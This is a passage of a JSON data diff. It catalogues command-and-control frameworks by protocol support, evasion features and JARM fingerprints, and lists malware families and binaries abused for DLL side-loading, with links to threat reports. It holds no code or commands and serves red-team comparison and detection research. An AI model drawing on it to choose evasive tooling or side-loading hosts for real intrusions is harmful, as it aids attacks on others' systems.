"logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "No", + "slack": "No", + "slack_members": "NA", + "gh_issues": "0", + "notes": "Direct, constant TCP connection" + }, + { + "name": "sak1to-shell", + "license": "NA", + "price": "NA", + "github": "https://github.com/d4rk007/sak1to-shell", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "SCYTHE", + "license": "Commercial", + "price": "Contact Sales", + "github": "https://github.com/scythe-io", + "site": "https://scythe.io", + "twitter": "@scythe_io", + "evaluator": "@Adam_Mashinchi", + "date": "7/7/2020", + "version": "3", + "implementation": "Binary", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "C", + "multi_user": "Yes", + "ui": "Web", + "dark_mode": "", + "api": "Yes", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "Yes", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "Yes", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "Yes", + "ldap": "", + "key_exchange": "Curve25519", + "stego": "Yes", + "proxy_aware": "Yes", + "domainfront": "Yes", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "Yes", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "Yes", + "dashboard": "Yes", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "2ad2ad16d2ad2ad22c42d42d0000006f254909a73bf62f6b28507e9fb451b5", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "NA", + "notes": "" + }, + { + "name": "Serpentine", + "license": "MIT", + "price": "NA", + "github": "https://github.com/jafarlihi/serpentine", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Shad0w", + "license": "MIT", + "price": "NA", + "github": "https://github.com/bats3c/shad0w", + "site": "", + "twitter": "@_batsec_", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Shadow Workers", + "license": "MIT", + "price": "NA", + "github": "https://github.com/shadow-workers/shadow-workers", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "SharpC2", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/SharpC2/SharpC2/tree/dev", + "site": "https://rastamouse.me/2020/05/sharpc2/", + "twitter": "@_RastaMouse @_xpn_", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "SilentTrinity", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/byt3bl33d3r/SILENTTRINITY", + "site": "", + "twitter": "@byt3bl33d3r", + "evaluator": "@0sm0s1z", + "date": "11/13/2019", + "version": "0.4.6dev", + "implementation": "Binary", + "how_to": "Yes", + "slingshot": "Yes", + "kali": "Yes", + "server": "Python", + "implant": "Boolang", + "multi_user": "Yes", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "ECDHE", + "stego": "No", + "proxy_aware": "No", + "domainfront": "Yes", + "custom_profile": "No", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "#silenttrinity bloodhoundhq.slack.com", + "slack_members": "489", + "gh_issues": "67", + "notes": "" + }, + { + "name": "SK8PARK/RAT", + "license": "NA", + "price": "NA", + "github": "https://github.com/slyd0g/", + "site": "", + "twitter": "@slyd0g", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "Yes", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "C++", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "Yes", + "windows": "", + "linux": "", + "macos": "", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "Encrypted Key Exchange", + "stego": "No", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "Yes", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "No", + "slack": "No", + "slack_members": "NA", + "gh_issues": "0", + "notes": "SK8PARK is server and SK8RAT is implant" + }, + { + "name": "Slack-C2Bot", + "license": "NA", + "price": "NA", + "github": "https://github.com/praetorian-inc/slack-c2bot", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "Yes", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "Yes", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "Slack" + }, + { + "name": "Slackor", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/n00py/Slackor", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "No", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Sliver", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/BishopFox/sliver", + "site": "", + "twitter": "@LittleJoeTables @rkervell @bishopfox", + "evaluator": "@jorgeorchilles", + "date": "11/5/2019", + "version": "0.0.6", + "implementation": "Binary", + "how_to": "Yes", + "slingshot": "Yes", + "kali": "Yes", + "server": "Go", + "implant": "Go", + "multi_user": "Yes", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "Yes", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "Yes", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "mTLS", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "Yes", + "attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "2ad2ad0002ad2ad00041d2ad2ad41da5207249a18099be84ef3c8811adc883", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "131", + "notes": "Good for evasion" + }, + { + "name": "SQLC2", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/NetSPI/SQLC2", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Throwback", + "license": "GNU GPL2", + "price": "NA", + "github": "https://github.com/silentbreaksec/Throwback", + "site": "", + "twitter": "@SilentBreakSec", + "evaluator": "@malcomvetter", + "date": "2/24/2020", + "version": "Aug 2017", + "implementation": "shell script", + "how_to": "Yes", + "slingshot": "", + "kali": "", + "server": "php", + "implant": "C++", + "multi_user": "Yes", + "ui": "Web", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "RC4", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "Yes", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "No", + "slack": "No", + "slack_members": "NA", + "gh_issues": "1", + "notes": "No updates in 5 years; web UI not authenticated" + }, + { + "name": "ThunderShell", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/Mr-Un1k0d3r/ThunderShell", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "ToRat", + "license": "Unlicense", + "price": "NA", + "github": "https://github.com/lu4p/ToRat", + "site": "", + "twitter": "@lu4p3", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Trevor", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/trustedsec/trevorc2/", + "site": "", + "twitter": "@HackingDave", + "evaluator": "@cabbagesalad2", + "date": "10/16/2019", + "version": "1.1", + "implementation": "pip3", + "how_to": "Yes", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "Python/PowerShell", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "AES", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "https://nasbench.medium.com/understanding-detecting-c2-frameworks-trevorc2-2a9ce6f1f425", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "5", + "notes": "" + }, + { + "name": "Violent Fungus", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/sogonsec/ViolentFungus-C2", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Void-RAT", + "license": "NA", + "price": "NA", + "github": "https://github.com/KadeDev/Void-RAT", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "No", + "slack": "No", + "slack_members": "NA", + "gh_issues": "", + "notes": "" + }, + { + "name": "Voodoo", + "license": "Commercial", + "price": "$2,000", + "github": "", + "site": "https://www.voodooops.com/", + "twitter": "@professor__plum", + "evaluator": "@kevinlustic", + "date": "2/12/2020", + "version": "0.2.3", + "implementation": "run.py", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "C++", + "multi_user": "Yes", + "ui": "Web", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "Yes", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "TLS + ChaCha20-Poly1305", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "No", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "Yes", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "s2universe.slack.com", + "slack_members": "189", + "gh_issues": "NA", + "notes": "Community edition available for evaluation and linked off the main site" + }, + { + "name": "WarFox", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/FULLSHADE/WarFox/", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "WEASEL", + "license": "MIT", + "price": "NA", + "github": "https://github.com/facebookincubator/WEASEL", + "site": "", + "twitter": "@ucsenoi", + "evaluator": "@jorgeorchilles", + "date": "12/3/2019", + "version": "1", + "implementation": "pip3", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "Python", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "No", + "http2": "No", + "http3": "No", + "dns": "Yes", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "AES", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "3", + "notes": "Beacons via DNS" + }, + { + "name": "Zuthaka", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/pucarasec/zuthaka", + "site": "", + "twitter": "@pucara", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + } + ], + "tools": [ + { + "names": [ + "wwlib.dll ", + "WinwordUpdates.exe" + ], + "comments": null, + "family": [], + "links": [ + "https://medium.com/@sp1d3rm4n/apt32-oceanlotus-m%E1%BB%99t-chi%E1%BA%BFn-d%E1%BB%8Bch-apt-b%C3%A0i-b%E1%BA%A3n-nh%C6%B0-th%E1%BA%BF-n%C3%A0o-ph%E1%BA%A7n-1-9975574e905" + ] + }, + { + "names": [ + "pcAnywhere Thinprobe Application", + "thinprobe.exe", + "thinhostprobedll.dll" + ], + "comments": null, + "family": [], + "links": [ + "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/" + ] + }, + { + "names": [ + "fakerx86.exe", + "Symbolic debugger for Microsoft Windows", + "dbgeng.dll" + ], + "comments": null, + "family": [], + "links": [ + "https://unit42.paloaltonetworks.com/new-attacks-linked-to-c0d0s0-group/" + ] + }, + { + "names": [ + "Chrome.exe", + "chrome_frame_helper.dll", + "Chrome browser" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "searchindexer.exe, searchprotoclhost.exe", + "msfte.dll" + ], + "comments": null, + "family": [], + "links": [ + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt" + ] + }, + { + "names": [ + "googleupdate.exe", + "Google Update", + "goopdate.dll" + ], + "comments": null, + "family": [], + "links": [ + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt" + ] + }, + { + "names": [ + "Kaspersky\u00e2\u0080\u0099s Avpia", + "product_info.dll", + "avpia.exe" + ], + "comments": null, + "family": [], + "links": [ + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt" + ] + }, + { + "names": [ + "NvSmartMax.dll", + "NVIDIA Smart Maximise Helper Host", + "NvSmart.exe" + ], + "comments": null, + "family": [], + "links": [ + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf" + ] + }, + { + "names": [ + "mcvsmap.exe" + ], + "comments": null, + "family": [], + "links": [ + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf" + ] + }, + { + "names": [ + "RASTLS.EXE" + ], + "comments": null, + "family": [], + "links": [ + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf" + ] + }, + { + "names": [ + "hcc.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "hkcmd.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "Mc.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "MsMpEng.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "msseces.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "OInfoP11.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "OleView.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "rc.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "LOLWLauncher.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "fsstm.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "AShld.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "fsguidll.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "mcf.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "mcupdui.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "mcut.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "ACLUI.DLL" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "POETWLauncher.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "ssMUIDLL.dll", + "RunHelp.exe" + ], + "comments": null, + "family": [], + "links": [ + "https://unit42.paloaltonetworks.com/plugx-uses-legitimate-samsung-application-for-dll-side-loading/" + ] + }, + { + "names": [ + "sep_NE.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "setup.dll" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "tplcdclr.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "Ushata.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "mcvsmap.exe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "OINFO11.exe", + "Oinfo11.ocx" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "Zegost", + "Moudoor", + "Piano Gh0st", + "Gh0st RAT" + ], + "comments": null, + "family": [], + "links": [ + "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf", + "https://sentinelone.com/blogs/the-curious-case-of-gh0st-malware/", + "http://researchcenter.paloaltonetworks.com/2015/09/musical-chairs-multi-year-campaign-involving-new-variant-of-gh0st-malware/", + "https://cysinfo.com/hunting-and-decrypting-communications-of-gh0st-rat-in-memory/" + ] + }, + { + "names": [ + "Darkmoon", + "PIVY", + "Poison Ivy" + ], + "comments": null, + "family": [], + "links": [ + "http://www.fireeye.com/resources/pdfs/fireeye-poison-ivy-report.pdf" + ] + }, + { + "names": [ + "9002 RAT", + "BKDR_MDMBOT", + "Naid", + "McRAT", + "HydraQ" + ], + "comments": null, + "family": [], + "links": [ + "https://cysinfo.com/hunting-apt-rat-9002-in-memory-using-volatility-plugin/", + "http://cybercampaigns.net/wp-content/uploads/2013/05/Hydraq.pdf" + ] + }, + { + "names": [ + "Gaolmay", + "Matrix RAT", + "Hikit" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "Sensode", + "Zxshell" + ], + "comments": null, + "family": [], + "links": [ + "http://pastebin.com/jCaLHvkM", + "https://blogs.cisco.com/security/talos/opening-zxshell" + ] + }, + { + "names": [ + "Fexel", + "DeputyDog" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "Korplug", + "Thoper", + "Sogu", + "PlugX", + "Kaba", + "Destory RAT" + ], + "comments": "Often uses DLL side-loading", + "family": [ + "PlugX" + ], + "links": [ + "http://blogs.cisco.com/security/talos/threat-spotlight-group-72", + "https://www.circl.lu/pub/tr-24/", + "http://labs.lastline.com/an-analysis-of-plugx" + ] + }, + { + "names": [ + "Lecna", + "BARYS", + "BACKSPACe" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "WarriorPride", + "Regin", + "QUERTY", + "Prax" + ], + "comments": "FEYES malware", + "family": [], + "links": [] + }, + { + "names": [ + "TokenControl", + "HttpBrowser" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "TravNet", + "Netfile", + "RedStar", + "NetTraveler" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + 